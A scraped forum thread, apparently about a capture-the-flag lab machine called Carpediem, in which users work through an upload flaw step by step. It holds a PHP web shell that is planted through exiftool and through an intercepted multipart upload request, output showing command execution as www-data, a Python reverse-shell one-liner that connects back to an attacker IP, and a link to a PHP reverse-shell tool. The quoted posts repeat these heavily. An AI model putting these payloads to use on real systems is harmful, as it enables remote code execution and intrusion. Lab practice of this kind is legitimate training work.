Posts: 17 Threads: 0 Joined: N/A (June 25, 2022, 09:08 PM)0xpwny Wrote: (June 25, 2022, 09:04 PM)Toto Wrote: (June 25, 2022, 08:57 PM)hacker1111 Wrote: (June 25, 2022, 08:50 PM)Toto Wrote: (June 25, 2022, 08:40 PM)hacker1111 Wrote: https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html
change .jpg/.png to .php in burp and right click on broken image for full path
Doesn't seem to work, tried uploading .php.jpg and .php but can't seem to reach the file afterwards.
use .png file
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' random.png
and in burp just change ext. .png to .php and send
refresh /admin user profile page and right click on broken image for full path
Can't seem to execute anything, did you succeed in getting anything ?
i can't intercept the request for upload the image on burp ensure intercept is on and click upload xD Posts: 81 Threads: 0 Joined: N/A (June 25, 2022, 09:08 PM)0xpwny Wrote: (June 25, 2022, 09:04 PM)Toto Wrote: (June 25, 2022, 08:57 PM)hacker1111 Wrote: (June 25, 2022, 08:50 PM)Toto Wrote: (June 25, 2022, 08:40 PM)hacker1111 Wrote: https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html
change .jpg/.png to .php in burp and right click on broken image for full path
Doesn't seem to work, tried uploading .php.jpg and .php but can't seem to reach the file afterwards.
use .png file
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' random.png
and in burp just change ext. .png to .php and send
refresh /admin user profile page and right click on broken image for full path
Can't seem to execute anything, did you succeed in getting anything ?
i can't intercept the request for upload the image on burp make sure to click on the account in admin panel and click my account or simply to this link http://portal.carpediem.htb/admin/?page=user Posts: 213 Threads: 0 Joined: N/A (June 25, 2022, 08:54 PM)langetmama11 Wrote: On the quarterly sales report seems like we can add files
By intercepting the request in burp it say: {"error":"multipart\/form-data missing"}
We can play with that and see if we can upload a shell I got code execution. POST /classes/Users.php?f=upload HTTP/1.1
Host: portal.carpediem.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://portal.carpediem.htb
Connection: close
Referer: http://portal.carpediem.htb/admin/?page=maintenance/files
Cookie: PHPSESSID=72ba94afdcf92c650a68d90b6cedda1e
Content-Length: 271
Content-Type: multipart/form-data; boundary=---------------------------355590062441708822781859836639
-----------------------------355590062441708822781859836639
Content-Disposition: form-data; name="file_upload"; filename="test.php"
Content-Type: image/jpeg
<?php echo "<pre>"; system($_GET['cmd']); ?>
-----------------------------355590062441708822781859836639--
http://portal.carpediem.htb/uploads/1656191700_test.php?cmd=id uid=33(www-data) gid=33(www-data) groups=33(www-data) Posts: 81 Threads: 0 Joined: N/A (June 25, 2022, 08:57 PM)hacker1111 Wrote: (June 25, 2022, 08:50 PM)Toto Wrote: (June 25, 2022, 08:40 PM)hacker1111 Wrote: (June 25, 2022, 08:36 PM)Toto Wrote: (June 25, 2022, 08:31 PM)hacker1111 Wrote: update your profile and intercept req. in burp
Okay thanks, missed it for some reason. Anyone got any success with uploading images ?
https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html
change .jpg/.png to .php in burp and right click on broken image for full path
Doesn't seem to work, tried uploading .php.jpg and .php but can't seem to reach the file afterwards.
use .png file
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' random.png
and in burp just change ext. .png to .php and send
refresh /admin user profile page and right click on broken image for full path were you able to exec command? Posts: 36 Threads: 0 Joined: N/A (June 25, 2022, 09:17 PM)Exa Wrote: (June 25, 2022, 08:54 PM)langetmama11 Wrote: On the quarterly sales report seems like we can add files
By intercepting the request in burp it say: {"error":"multipart\/form-data missing"}
We can play with that and see if we can upload a shell
I got code execution.
POST /classes/Users.php?f=upload HTTP/1.1
Host: portal.carpediem.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://portal.carpediem.htb
Connection: close
Referer: http://portal.carpediem.htb/admin/?page=maintenance/files
Cookie: PHPSESSID=72ba94afdcf92c650a68d90b6cedda1e
Content-Length: 271
Content-Type: multipart/form-data; boundary=---------------------------355590062441708822781859836639
-----------------------------355590062441708822781859836639
Content-Disposition: form-data; name="file_upload"; filename="test.php"
Content-Type: image/jpeg
<?php echo "<pre>"; system($_GET['cmd']); ?>
-----------------------------355590062441708822781859836639--
http://portal.carpediem.htb/uploads/1656191700_test.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data) Same, trying to get a reverse shell. Posts: 104 Threads: 0 Joined: N/A (June 25, 2022, 09:17 PM)Toto Wrote: (June 25, 2022, 09:17 PM)Exa Wrote: (June 25, 2022, 08:54 PM)langetmama11 Wrote: On the quarterly sales report seems like we can add files
By intercepting the request in burp it say: {"error":"multipart\/form-data missing"}
We can play with that and see if we can upload a shell
I got code execution.
POST /classes/Users.php?f=upload HTTP/1.1
Host: portal.carpediem.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://portal.carpediem.htb
Connection: close
Referer: http://portal.carpediem.htb/admin/?page=maintenance/files
Cookie: PHPSESSID=72ba94afdcf92c650a68d90b6cedda1e
Content-Length: 271
Content-Type: multipart/form-data; boundary=---------------------------355590062441708822781859836639
-----------------------------355590062441708822781859836639
Content-Disposition: form-data; name="file_upload"; filename="test.php"
Content-Type: image/jpeg
<?php echo "<pre>"; system($_GET['cmd']); ?>
-----------------------------355590062441708822781859836639--
http://portal.carpediem.htb/uploads/1656191700_test.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Same, trying to get a reverse shell. http://portal.carpediem.htb/uploads/shell.php?cmd=export%20RHOST=%2210.10.x.x%22;export%20RPORT=9001;python3%20-c%20%27import%20sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(%22RHOST%22),int(os.getenv(%22RPORT%22))));[os.dup2(s.fileno(),fd)%20for%20fd%20in%20(0,1,2)];pty.spawn(%22bash%22)%27
Posts: 36 Threads: 0 Joined: N/A (June 25, 2022, 09:21 PM)hacker1111 Wrote: (June 25, 2022, 09:17 PM)Toto Wrote: (June 25, 2022, 09:17 PM)Exa Wrote: (June 25, 2022, 08:54 PM)langetmama11 Wrote: On the quarterly sales report seems like we can add files
By intercepting the request in burp it say: {"error":"multipart\/form-data missing"}
We can play with that and see if we can upload a shell
I got code execution.
POST /classes/Users.php?f=upload HTTP/1.1
Host: portal.carpediem.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://portal.carpediem.htb
Connection: close
Referer: http://portal.carpediem.htb/admin/?page=maintenance/files
Cookie: PHPSESSID=72ba94afdcf92c650a68d90b6cedda1e
Content-Length: 271
Content-Type: multipart/form-data; boundary=---------------------------355590062441708822781859836639
-----------------------------355590062441708822781859836639
Content-Disposition: form-data; name="file_upload"; filename="test.php"
Content-Type: image/jpeg
<?php echo "<pre>"; system($_GET['cmd']); ?>
-----------------------------355590062441708822781859836639--
http://portal.carpediem.htb/uploads/1656191700_test.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Same, trying to get a reverse shell.
export RHOST="10.10.x.x";export RPORT=9001;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
You put that in the comment section ? Posts: 81 Threads: 0 Joined: N/A (June 25, 2022, 09:17 PM)Exa Wrote: (June 25, 2022, 08:54 PM)langetmama11 Wrote: On the quarterly sales report seems like we can add files
By intercepting the request in burp it say: {"error":"multipart\/form-data missing"}
We can play with that and see if we can upload a shell
I got code execution.
POST /classes/Users.php?f=upload HTTP/1.1
Host: portal.carpediem.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Origin: http://portal.carpediem.htb
Connection: close
Referer: http://portal.carpediem.htb/admin/?page=maintenance/files
Cookie: PHPSESSID=72ba94afdcf92c650a68d90b6cedda1e
Content-Length: 271
Content-Type: multipart/form-data; boundary=---------------------------355590062441708822781859836639
-----------------------------355590062441708822781859836639
Content-Disposition: form-data; name="file_upload"; filename="test.php"
Content-Type: image/jpeg
<?php echo "<pre>"; system($_GET['cmd']); ?>
-----------------------------355590062441708822781859836639--
http://portal.carpediem.htb/uploads/1656191700_test.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data) NIce that note saying still in development was sus Let's get a proper shell now Posts: 81 Threads: 0 Joined: N/A Use this revshell
http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
and replace contents in burpsuite Posts: 104 Threads: 0 Joined: N/A Another subdomain trudesk.carpediem.htb
|
